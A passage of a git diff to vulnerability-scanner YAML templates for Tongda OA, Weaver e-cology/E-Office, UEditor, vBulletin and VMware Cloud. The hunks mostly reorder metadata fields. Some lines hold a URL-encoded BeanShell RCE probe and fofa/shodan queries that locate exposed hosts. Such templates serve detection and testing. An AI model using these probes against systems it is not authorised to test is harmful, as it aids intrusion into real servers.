https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/%E9%80%9A%E8%BE%BEOA/%E9%80%9A%E8%BE%BEOA%20v11.6%20insert%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md + classification: + cpe: cpe:2.3:a:tongda2000:office_anywhere:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 - fofa-query: app="TDXK-通达OA" - product: office_anywhere vendor: tongda2000 + product: office_anywhere + fofa-query: app="TDXK-通达OA" tags: tongda,sqli,intrusive - classification: - cpe: cpe:2.3:a:tongda2000:office_anywhere:*:*:*:*:*:*:*:* http: - raw: - | @@ -48,4 +48,4 @@ http: - "register_for/?rid=" negative: true -# digest: 4b0a004830460221009ed8e040f9c911e7b4528b68de3d737caf0324411add23a0bf7b5f4313090f09022100c70aafde7c380998799b974261723a1c4a1247cdbb59b5dd156e249be7af06ee:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a004830460221009ed8e040f9c911e7b4528b68de3d737caf0324411add23a0bf7b5f4313090f09022100c70aafde7c380998799b974261723a1c4a1247cdbb59b5dd156e249be7af06ee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/tongda/tongda-meeting-unauth.yaml b/http/vulnerabilities/tongda/tongda-meeting-unauth.yaml index c36ee0c649..fa284347bf 100755 --- a/http/vulnerabilities/tongda/tongda-meeting-unauth.yaml +++ b/http/vulnerabilities/tongda/tongda-meeting-unauth.yaml @@ -8,16 +8,16 @@ info: Tongda Meeting Unauthorized Access were Detected. reference: - https://github.com/hktalent/scan4all/blob/2a7faf7862265eab33699034fd193bcf11b44e0f/config/poc/%E9%80%9A%E8%BE%BEoa/%E9%80%9A%E8%BE%BEoa-meeting-unauthorized-access.json#L10 + classification: + cpe: cpe:2.3:a:tongda2000:office_anywhere:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - fofa-query: app="TDXK-通达OA" - product: office_anywhere vendor: tongda2000 + product: office_anywhere + fofa-query: app="TDXK-通达OA" tags: tongda,unauth,misconfig - classification: - cpe: cpe:2.3:a:tongda2000:office_anywhere:*:*:*:*:*:*:*:* http: - method: GET path: @@ -30,4 +30,4 @@ http: - contains_all(body, 'creator\":', 'originalTitle\":', 'view\":', 'type\":') condition: and -# digest: 4a0a00473045022029eb9d9d545baec4d0f578a10dc5d80bec85c87e3f1cf9ba17933bd242cbb164022100d83d82f1c8bde2f33f1bc331ba22cd156b9984612a602d9e47e5599a498f3dbd:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022029eb9d9d545baec4d0f578a10dc5d80bec85c87e3f1cf9ba17933bd242cbb164022100d83d82f1c8bde2f33f1bc331ba22cd156b9984612a602d9e47e5599a498f3dbd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/tongda/tongda-report-func-sqli.yaml b/http/vulnerabilities/tongda/tongda-report-func-sqli.yaml index d676145ce2..2c763f8be6 100755 --- a/http/vulnerabilities/tongda/tongda-report-func-sqli.yaml +++ b/http/vulnerabilities/tongda/tongda-report-func-sqli.yaml @@ -8,16 +8,16 @@ info: Tongda OA v11.6 report_bi.func.php has a SQL injection vulnerability, and attackers can obtain database information through the vulnerability. reference: - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/%E9%80%9A%E8%BE%BEOA/%E9%80%9A%E8%BE%BEOA%20v11.6%20report_bi.func.php%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md + classification: + cpe: cpe:2.3:a:tongda2000:office_anywhere:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - fofa-query: app="TDXK-通达OA" - product: office_anywhere vendor: tongda2000 + product: office_anywhere + fofa-query: app="TDXK-通达OA" tags: tongda,sqli - classification: - cpe: cpe:2.3:a:tongda2000:office_anywhere:*:*:*:*:*:*:*:* http: - raw: - | @@ -40,4 +40,4 @@ http: status: - 200 -# digest: 4a0a0047304502202623ac67b5c9288c847a41c8d90dbd04d224ed78715cc2a7ab9efd4890d6f9bd022100d63e3e11d77b2dfa8cfe2eede3fa56019d78cc62312fac8445b11e6bfa15c563:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502202623ac67b5c9288c847a41c8d90dbd04d224ed78715cc2a7ab9efd4890d6f9bd022100d63e3e11d77b2dfa8cfe2eede3fa56019d78cc62312fac8445b11e6bfa15c563:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/tongda/tongda-video-file-read.yaml b/http/vulnerabilities/tongda/tongda-video-file-read.yaml index 709c3da4d7..cb996c897c 100755 --- a/http/vulnerabilities/tongda/tongda-video-file-read.yaml +++ b/http/vulnerabilities/tongda/tongda-video-file-read.yaml @@ -8,6 +8,8 @@ info: There is an arbitrary file reading vulnerability in Extreme OA video_file.php. An attacker can obtain sensitive files on the server through the vulnerability. reference: - http://wiki.peiqi.tech/wiki/oa/通达OA/通达OA%20v2017%20video_file.php%20任意文件下载漏洞.html + classification: + cpe: cpe:2.3:a:tongda2000:office_anywhere_2017:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 @@ -16,8 +18,6 @@ info: vendor: tongda2000 tags: tongda,lfi - classification: - cpe: cpe:2.3:a:tongda2000:office_anywhere_2017:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/vulnerabilities/tongda/tongdaoa-auth-bypass.yaml b/http/vulnerabilities/tongda/tongdaoa-auth-bypass.yaml index f329ebc72c..697be879c1 100755 --- a/http/vulnerabilities/tongda/tongdaoa-auth-bypass.yaml +++ b/http/vulnerabilities/tongda/tongdaoa-auth-bypass.yaml @@ -9,16 +9,15 @@ info: reference: - https://github.com/Phuong39/2022-HW-POC/blob/main/%E9%80%9A%E8%BE%BEOA%E7%99%BB%E5%BD%95%E8%AE%A4%E8%AF%81%E7%BB%95%E8%BF%87.md - https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/tongda-oa-2017-auth-bypass.yaml + classification: + cpe: cpe:2.3:a:tongda2000:office_anywhere:*:*:*:*:*:*:*:* metadata: verified: true max-request: 3 - fofa-query: app="TDXK-通达OA" - product: office_anywhere vendor: tongda2000 + product: office_anywhere + fofa-query: app="TDXK-通达OA" tags: tongda,auth-bypass,misconfig - - classification: - cpe: cpe:2.3:a:tongda2000:office_anywhere:*:*:*:*:*:*:*:* flow: http(1) && http(2) && http(3) http: @@ -57,4 +56,5 @@ http: - type: dsl dsl: - 'status_code == 200 && !contains(body,"<title>用户未登录") && contains(body,"loginUser")' -# digest: 4a0a00473045022013452a801bc921f3284065e0d29a2ec63d9a7eb1dd620b6581ce66a6bcb431d7022100cf60512421e59a2e4a7e43f653c6fde533ea31310fdc7727b683831afd0a9f5e:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a00473045022013452a801bc921f3284065e0d29a2ec63d9a7eb1dd620b6581ce66a6bcb431d7022100cf60512421e59a2e4a7e43f653c6fde533ea31310fdc7727b683831afd0a9f5e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/ueditor/ueditor-ssrf.yaml b/http/vulnerabilities/ueditor/ueditor-ssrf.yaml index ab9dbf7f47..2973720050 100644 --- a/http/vulnerabilities/ueditor/ueditor-ssrf.yaml +++ b/http/vulnerabilities/ueditor/ueditor-ssrf.yaml @@ -8,16 +8,16 @@ info: reference: - https://xz.aliyun.com/t/4154 - https://www.seebug.org/vuldb/ssvid-97311 + classification: + cpe: cpe:2.3:a:baidu:ueditor:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 - shodan-query: html:"UEditor" - product: ueditor vendor: baidu + product: ueditor + shodan-query: html:"UEditor" tags: ueditor,ssrf - classification: - cpe: cpe:2.3:a:baidu:ueditor:*:*:*:*:*:*:*:* http: - method: GET path: @@ -40,4 +40,4 @@ http: status: - 200 -# digest: 4a0a00473045022034a2ccb1f146bbff39753d4c528f61104f9338c229ca80ce3d1d4895147c79ba02210082745015da69b50bc88d075fac2062fe2732be6a2217350bbc8cb1415be6b272:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022034a2ccb1f146bbff39753d4c528f61104f9338c229ca80ce3d1d4895147c79ba02210082745015da69b50bc88d075fac2062fe2732be6a2217350bbc8cb1415be6b272:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/vbulletin/vbulletin-search-sqli.yaml b/http/vulnerabilities/vbulletin/vbulletin-search-sqli.yaml index 14ad245dc9..1e07c7bd57 100644 --- a/http/vulnerabilities/vbulletin/vbulletin-search-sqli.yaml +++ b/http/vulnerabilities/vbulletin/vbulletin-search-sqli.yaml @@ -10,16 +10,16 @@ info: reference: - https://www.exploit-db.com/exploits/17314 - https://web.archive.org/web/20181129123620/https://j0hnx3r.org/vbulletin-4-x-sql-injection-vulnerability/ + classification: + cpe: cpe:2.3:a:vbulletin:vbulletin:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: http.component:"vBulletin" - product: vbulletin vendor: vbulletin + product: vbulletin + shodan-query: http.component:"vBulletin" tags: vbulletin,sqli - classification: - cpe: cpe:2.3:a:vbulletin:vbulletin:*:*:*:*:*:*:*:* http: - raw: - | @@ -43,4 +43,5 @@ http: - 200 - 503 condition: or -# digest: 4b0a0048304602210084dd0d783afb78cfa19cc10f84030918f06fe86708e84bc6d5bfdf4ced8fe10c02210094a54b19eb0bb0c4c16160977a3be435769921093900186566c64fa372caafdb:922c64590222798bb761d5b6d8e72950 + +# digest: 4b0a0048304602210084dd0d783afb78cfa19cc10f84030918f06fe86708e84bc6d5bfdf4ced8fe10c02210094a54b19eb0bb0c4c16160977a3be435769921093900186566c64fa372caafdb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/vmware/vmware-cloud-xss.yaml b/http/vulnerabilities/vmware/vmware-cloud-xss.yaml index 55202c3063..d5146c1864 100644 --- a/http/vulnerabilities/vmware/vmware-cloud-xss.yaml +++ b/http/vulnerabilities/vmware/vmware-cloud-xss.yaml @@ -5,16 +5,16 @@ info: author: tess severity: medium description: VMWare Cloud is vulnerable to Reflected Cross Site Scripting vulnerability. + classification: + cpe: cpe:2.3:a:vmware:cloud_foundation:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: title:"Vmware Cloud" - product: cloud_foundation vendor: vmware + product: cloud_foundation + shodan-query: title:"Vmware Cloud" tags: vmware,xss,cloud - classification: - cpe: cpe:2.3:a:vmware:cloud_foundation:*:*:*:*:*:*:*:* http: - method: GET path: @@ -37,4 +37,5 @@ http: - type: status status: - 200 -# digest: 490a0046304402205d88d88853e066013a32d7ed78c77379b08fbe8c98a298a83502d5a067bbc726022009d488077eb6df2ebe8abd3325fd96f823689b9ba487057fdb64f6e41fc8d869:922c64590222798bb761d5b6d8e72950 + +# digest: 490a0046304402205d88d88853e066013a32d7ed78c77379b08fbe8c98a298a83502d5a067bbc726022009d488077eb6df2ebe8abd3325fd96f823689b9ba487057fdb64f6e41fc8d869:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/weaver/ecology-jqueryfiletree-traversal.yaml b/http/vulnerabilities/weaver/ecology-jqueryfiletree-traversal.yaml index 8b2f48211a..d115784224 100755 --- a/http/vulnerabilities/weaver/ecology-jqueryfiletree-traversal.yaml +++ b/http/vulnerabilities/weaver/ecology-jqueryfiletree-traversal.yaml @@ -8,17 +8,17 @@ info: Panwei OA E-Cology jqueryFileTree.jsp directory traversal vulnerability. reference: - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/90103c248a2c52bb0a060d0ee95d5a67e4579c3d/docs/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Cology%20jqueryFileTree.jsp%20%E7%9B%AE%E5%BD%95%E9%81%8D%E5%8E%86%E6%BC%8F%E6%B4%9E.md?plain=1#L24 + classification: + cpe: cpe:2.3:a:weaver:e-cology:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 + vendor: weaver + product: e-cology shodan-query: ecology_JSessionid fofa-query: app="泛微-协同办公OA" - product: e-cology - vendor: weaver tags: weaver,ecology,traversal,lfr - classification: - cpe: cpe:2.3:a:weaver:e-cology:*:*:*:*:*:*:*:* http: - method: GET path: @@ -37,4 +37,4 @@ http: status: - 200 -# digest: 4a0a004730450220084693227949fe0d92a25b723d712313045095556beeab08ed5c2755c7cc4623022100c12802c1e612411f9558a892fa802d0c08c58b07dcce2104f91503f82c08f847:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450220084693227949fe0d92a25b723d712313045095556beeab08ed5c2755c7cc4623022100c12802c1e612411f9558a892fa802d0c08c58b07dcce2104f91503f82c08f847:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/weaver/ecology-verifyquicklogin-auth-bypass.yaml b/http/vulnerabilities/weaver/ecology-verifyquicklogin-auth-bypass.yaml index 91c7c00430..951bcb63b1 100755 --- a/http/vulnerabilities/weaver/ecology-verifyquicklogin-auth-bypass.yaml +++ b/http/vulnerabilities/weaver/ecology-verifyquicklogin-auth-bypass.yaml @@ -8,15 +8,15 @@ info: There is an arbitrary administrator login vulnerability in the Panwei OA E-Cology VerifyQuickLogin.jsp file. An attacker can obtain the administrator Session by sending a special request package. reference: - http://wiki.peiqi.tech/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Cology%20VerifyQuickLogin.jsp%20%E4%BB%BB%E6%84%8F%E7%AE%A1%E7%90%86%E5%91%98%E7%99%BB%E5%BD%95%E6%BC%8F%E6%B4%9E.html - metadata: - max-request: 1 - fofa-query: app="泛微-协同办公OA" - product: e-cology - vendor: weaver - tags: ecology,weaver,oa,auth-bypass - classification: cpe: cpe:2.3:a:weaver:e-cology:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: weaver + product: e-cology + fofa-query: app="泛微-协同办公OA" + tags: ecology,weaver,oa,auth-bypass + http: - raw: - | @@ -39,4 +39,4 @@ http: status: - 200 -# digest: 4b0a00483046022100cfd4d41d929b8e53906785ad3b7a060a9332012c1c1f1a29ecf69bd8372bdb3b022100de10a869048be60516db1032c67b36751b14daa03450d34da001f799731cd0e8:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100cfd4d41d929b8e53906785ad3b7a060a9332012c1c1f1a29ecf69bd8372bdb3b022100de10a869048be60516db1032c67b36751b14daa03450d34da001f799731cd0e8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/weaver/weaver-checkserver-sqli.yaml b/http/vulnerabilities/weaver/weaver-checkserver-sqli.yaml index 2ead9eb6a4..090614265d 100644 --- a/http/vulnerabilities/weaver/weaver-checkserver-sqli.yaml +++ b/http/vulnerabilities/weaver/weaver-checkserver-sqli.yaml @@ -10,16 +10,16 @@ info: - https://stack.chaitin.com/techblog/detail?id=81 - https://github.com/lal0ne/vulnerability/blob/main/%E6%B3%9B%E5%BE%AE/E-Cology/CheckServer/README.md - https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/weaver-ecology-oa-plugin-checkserver-setting-sqli.yaml + classification: + cpe: cpe:2.3:a:weaver:e-cology:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - fofa-query: app="泛微-协同办公OA" - product: e-cology vendor: weaver + product: e-cology + fofa-query: app="泛微-协同办公OA" tags: weaver,ecology,sqli - classification: - cpe: cpe:2.3:a:weaver:e-cology:*:*:*:*:*:*:*:* http: - method: GET path: @@ -33,4 +33,4 @@ http: - "contains(body, 'error\":\"system error') && !contains(body, 'securityIntercept')" condition: and -# digest: 4a0a0047304502203971c4e5664482479370bb1b1f56e4615b5a7d7b64f74ea6104ba1161c63cc3e022100c1e6508ec3615a4313c8cf683984d8424cd47b0d3b340e04a0e81cb5f713e4cf:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502203971c4e5664482479370bb1b1f56e4615b5a7d7b64f74ea6104ba1161c63cc3e022100c1e6508ec3615a4313c8cf683984d8424cd47b0d3b340e04a0e81cb5f713e4cf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/weaver/weaver-ecology-bshservlet-rce.yaml b/http/vulnerabilities/weaver/weaver-ecology-bshservlet-rce.yaml index 2539484618..71292fdd72 100755 --- a/http/vulnerabilities/weaver/weaver-ecology-bshservlet-rce.yaml +++ b/http/vulnerabilities/weaver/weaver-ecology-bshservlet-rce.yaml @@ -6,17 +6,17 @@ info: severity: critical description: | Weaver BeanShell contains a remote command execution vulnerability in the bsh.servlet.BshServlet program. + classification: + cpe: cpe:2.3:a:weaver:e-cology:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 + vendor: weaver + product: e-cology shodan-query: ecology_JSessionid fofa-query: app="泛微-协同办公OA" - product: e-cology - vendor: weaver tags: beanshell,rce,weaver - classification: - cpe: cpe:2.3:a:weaver:e-cology:*:*:*:*:*:*:*:* http: - raw: - | @@ -31,6 +31,7 @@ http: Content-Type: application/x-www-form-urlencoded %62%73%68%2e%73%63%72%69%70%74=%70%72%69%6e%74%28%22{{randstr}}%22%29%3b + matchers-condition: and matchers: - type: regex @@ -43,4 +44,4 @@ http: status: - 200 -# digest: 4a0a00473045022100c9ba653f57e01fe93046cf98f3051f013ebdb7d92c0cd2869712af7437fab42b0220290358ee34352b5b70ca770c5531a3deff20a4c8a1c43b569b14a46cbfb7517b:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100c9ba653f57e01fe93046cf98f3051f013ebdb7d92c0cd2869712af7437fab42b0220290358ee34352b5b70ca770c5531a3deff20a4c8a1c43b569b14a46cbfb7517b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/weaver/weaver-group-xml-sqli.yaml b/http/vulnerabilities/weaver/weaver-group-xml-sqli.yaml index 9f6611d50a..f35d1f8da0 100755 --- a/http/vulnerabilities/weaver/weaver-group-xml-sqli.yaml +++ b/http/vulnerabilities/weaver/weaver-group-xml-sqli.yaml @@ -9,16 +9,15 @@ info: reference: - http://wiki.peiqi.tech/wiki/oa/泛微OA/泛微OA%20E-Office%20group_xml.php%20SQL注入漏洞.html - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Office%20group_xml.php%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md + classification: + cpe: cpe:2.3:a:weaver:e-office:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 - fofa-query: app="泛微-EOffice" - product: e-office vendor: weaver + product: e-office + fofa-query: app="泛微-EOffice" tags: weaver,e-office,oa,sqli - - classification: - cpe: cpe:2.3:a:weaver:e-office:*:*:*:*:*:*:*:* variables: filename: "{{to_lower(rand_base(5))}}" string: "weaver-group-xml-sqli" @@ -44,4 +43,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100e520e096b9c8cdad4c8c78447d8bfb96088bfa3c937b57b15dd40914d7ba834e0220136edb9f4931e4d48788270d2f76b8333475d5774ab70dc2a7c03f3fce85b649:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a00473045022100e520e096b9c8cdad4c8c78447d8bfb96088bfa3c937b57b15dd40914d7ba834e0220136edb9f4931e4d48788270d2f76b8333475d5774ab70dc2a7c03f3fce85b649:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/weaver/weaver-mysql-config-info-leak.yaml b/http/vulnerabilities/weaver/weaver-mysql-config-info-leak.yaml index 3b282147e9..8d9f30b9d4 100644 --- a/http/vulnerabilities/weaver/weaver-mysql-config-info-leak.yaml +++ b/http/vulnerabilities/weaver/weaver-mysql-config-info-leak.yaml @@ -8,16 +8,16 @@ info: E-Office mysql_config.ini file can be directly accessed, leaking database account password and other information reference: - https://github.com/Threekiii/Awesome-POC/blob/master/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E6%B3%9B%E5%BE%AEOA%20E-Office%20mysql_config.ini%20%E6%95%B0%E6%8D%AE%E5%BA%93%E4%BF%A1%E6%81%AF%E6%B3%84%E6%BC%8F%E6%BC%8F%E6%B4%9E.md + classification: + cpe: cpe:2.3:a:weaver:e-office:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - fofa-query: app="泛微-EOffice" - product: e-office vendor: weaver + product: e-office + fofa-query: app="泛微-EOffice" tags: ecology,weaver,oa,lfi - classification: - cpe: cpe:2.3:a:weaver:e-office:*:*:*:*:*:*:*:* http: - method: GET path: @@ -31,4 +31,4 @@ http: - 'contains_all(body,"datapassword", "datauser")' condition: and -# digest: 4a0a00473045022003d14acb438bcd3ddfaab392c67ae2d0fd30ddbe80da964d403b0403eee025dd022100d6c9d8d5b6864cd317a1b28d3c9a5eeb35e4a0bbfb64a43f01c526d2a5e63070:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022003d14acb438bcd3ddfaab392c67ae2d0fd30ddbe80da964d403b0403eee025dd022100d6c9d8d5b6864cd317a1b28d3c9a5eeb35e4a0bbfb64a43f01c526d2a5e63070:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/weaver/weaver-officeserver-lfi.yaml b/http/vulnerabilities/weaver/weaver-officeserver-lfi.yaml index 2382dac256..dde30c9815 100755 --- a/http/vulnerabilities/weaver/weaver-officeserver-lfi.yaml +++ b/http/vulnerabilities/weaver/weaver-officeserver-lfi.yaml @@ -8,16 +8,16 @@ info: There is an arbitrary file reading vulnerability in the OA E-Office officeserver.php file. An attacker can download any file on the server through the vulnerability. reference: - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Office%20officeserver.php%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md + classification: + cpe: cpe:2.3:a:weaver:e-office:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - fofa-query: app="泛微-EOffice" - product: e-office vendor: weaver + product: e-office + fofa-query: app="泛微-EOffice" tags: weaver,e-cology,oa,lfi - classification: - cpe: cpe:2.3:a:weaver:e-office:*:*:*:*:*:*:*:* http: - method: GET path: @@ -36,4 +36,4 @@ http: status: - 200 -# digest: 4b0a00483046022100fb9aeeb75f2885f9cc403726aa4d125ca77e8facb6edec2abaffd3cafd4b4509022100e2c4560b8ffe79150e0285b4fa87e5cc1c59869c3c34f7153bd336365e6dc3b3:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100fb9aeeb75f2885f9cc403726aa4d125ca77e8facb6edec2abaffd3cafd4b4509022100e2c4560b8ffe79150e0285b4fa87e5cc1c59869c3c34f7153bd336365e6dc3b3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/weaver/weaver-signaturedownload-lfi.yaml b/http/vulnerabilities/weaver/weaver-signaturedownload-lfi.yaml index 1c9b8ab04a..a68f9d06dd 100755 --- a/http/vulnerabilities/weaver/weaver-signaturedownload-lfi.yaml +++ b/http/vulnerabilities/weaver/weaver-signaturedownload-lfi.yaml @@ -8,16 +8,16 @@ info: There is an arbitrary file reading vulnerability in the E-Weaver SignatureDownLoad interface of Panwei OA. An attacker can read any file on the server through the vulnerability. reference: - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Weaver%20SignatureDownLoad%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md + classification: + cpe: cpe:2.3:a:weaver:e-cology:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - fofa-query: app="泛微-E-Weaver" - product: e-cology vendor: weaver + product: e-cology + fofa-query: app="泛微-E-Weaver" tags: ecology,weaver,oa,lfi - classification: - cpe: cpe:2.3:a:weaver:e-cology:*:*:*:*:*:*:*:* http: - method: GET path: @@ -43,4 +43,4 @@ http: status: - 200 -# digest: 4b0a004830460221009c7c7fbcc6408d7a1d23b362176285fb7d990fd0b0b5785b7235a8a8304ef38a022100e87911cec4d1ab35b9459482066c0fb80c90ccc0bb05850c8e4621645ddae578:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a004830460221009c7c7fbcc6408d7a1d23b362176285fb7d990fd0b0b5785b7235a8a8304ef38a022100e87911cec4d1ab35b9459482066c0fb80c90ccc0bb05850c8e4621645ddae578:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/weaver/weaver-sptmforportalthumbnail-lfi.yaml b/http/vulnerabilities/weaver/weaver-sptmforportalthumbnail-lfi.yaml index 0283b08fe2..be04a427de 100755 --- a/http/vulnerabilities/weaver/weaver-sptmforportalthumbnail-lfi.yaml +++ b/http/vulnerabilities/weaver/weaver-sptmforportalthumbnail-lfi.yaml @@ -9,16 +9,16 @@ info: reference: - http://124.223.89.192/archives/e-cology8-14 - https://github.com/GREENHAT7/pxplan/blob/main/xray_pocs/yaml-poc-weaver-weaver_e_cology_oa-readfile-CT-479157.yml + classification: + cpe: cpe:2.3:a:weaver:e-cology:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - fofa-query: app="泛微-E-Weaver" - product: e-cology vendor: weaver + product: e-cology + fofa-query: app="泛微-E-Weaver" tags: weaver,e-cology,oa,lfi - classification: - cpe: cpe:2.3:a:weaver:e-cology:*:*:*:*:*:*:*:* http: - method: GET path: @@ -42,4 +42,4 @@ http: status: - 200 -# digest: 4a0a004730450220781ac3c5267b2f1315f8f10652cbfe1c4aaefd5b665e5e33b1b02617218dcce5022100e65c3fce695fe99f73741f270f84b9b53c5400a46d7e6e84908dfcd5180ea22d:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450220781ac3c5267b2f1315f8f10652cbfe1c4aaefd5b665e5e33b1b02617218dcce5022100e65c3fce695fe99f73741f270f84b9b53c5400a46d7e6e84908dfcd5180ea22d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/weaver/weaver-uploadify-file-upload.yaml b/http/vulnerabilities/weaver/weaver-uploadify-file-upload.yaml index 061a4b4733..60ef2ac68e 100755 --- a/http/vulnerabilities/weaver/weaver-uploadify-file-upload.yaml +++ b/http/vulnerabilities/weaver/weaver-uploadify-file-upload.yaml @@ -7,16 +7,15 @@ info: description: OA E-Office Uploadify is vulnerable to arbitrary file upload. reference: - https://github.com/w-digital-scanner/w9scan/blob/master/plugins/weaver_oa/2158.py + classification: + cpe: cpe:2.3:a:weaver:e-office:*:*:*:*:*:*:*:* metadata: verified: true max-request: 3 - fofa-query: app="泛微-EOffice" - product: e-office vendor: weaver + product: e-office + fofa-query: app="泛微-EOffice" tags: weaver,e-office,oa,intrusive,rce,fileupload - - classification: - cpe: cpe:2.3:a:weaver:e-office:*:*:*:*:*:*:*:* variables: filename: "{{to_lower(rand_base(5))}}" string: "weaver-uploadify-file-upload" @@ -55,4 +54,5 @@ http: part: body_3 words: - '{{md5(string)}}' -# digest: 4a0a00473045022100ea1e7695c9aaf1ada15cdf7fa48fd1c6ceeb59531a0cd0eff574e82be9e7729202207a3ba25d67b43620582053921ed636208d01159dc85788a8961b33220a8a3a07:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a00473045022100ea1e7695c9aaf1ada15cdf7fa48fd1c6ceeb59531a0cd0eff574e82be9e7729202207a3ba25d67b43620582053921ed636208d01159dc85788a8961b33220a8a3a07:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/weaver/weaver-userselect-unauth.yaml b/http/vulnerabilities/weaver/weaver-userselect-unauth.yaml index 0ffd2d99a6..66ddc62b1a 100755 --- a/http/vulnerabilities/weaver/weaver-userselect-unauth.yaml +++ b/http/vulnerabilities/weaver/weaver-userselect-unauth.yaml @@ -9,16 +9,16 @@ info: reference: - https://github.com/achuna33/MYExploit/blob/8ffbf7ee60cbd77ad90b0831b93846aba224ab29/src/main/java/com/achuna33/Controllers/WeaverEOfficeController.java - http://wiki.peiqi.tech/wiki/oa/泛微OA/泛微OA%20E-Office%20UserSelect%20未授权访问漏洞.html + classification: + cpe: cpe:2.3:a:weaver:e-office:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - fofa-query: app="泛微-EOffice" - product: e-office vendor: weaver + product: e-office + fofa-query: app="泛微-EOffice" tags: weaver,e-office,oa,unauth - classification: - cpe: cpe:2.3:a:weaver:e-office:*:*:*:*:*:*:*:* http: - method: GET path: @@ -36,4 +36,4 @@ http: status: - 200 -# digest: 4a0a00473045022100a5327e5c4aa4bba40eb3dd6591e0262f3b68adb18dfe67506e1d01b19d89aea502205e2bc2df2faf6ad056f62b27aeb9871fc23f7f75f6e422837c1f4d1344a9ba6b:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100a5327e5c4aa4bba40eb3dd6591e0262f3b68adb18dfe67506e1d01b19d89aea502205e2bc2df2faf6ad056f62b27aeb9871fc23f7f75f6e422837c1f4d1344a9ba6b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/wechat/wechat-info-leak.yaml b/http/vulnerabilities/wechat/wechat-info-leak.yaml index c610f533c0..507622a5b6 100644 --- a/http/vulnerabilities/wechat/wechat-info-leak.yaml +++ b/http/vulnerabilities/wechat/wechat-info-leak.yaml @@ -8,16 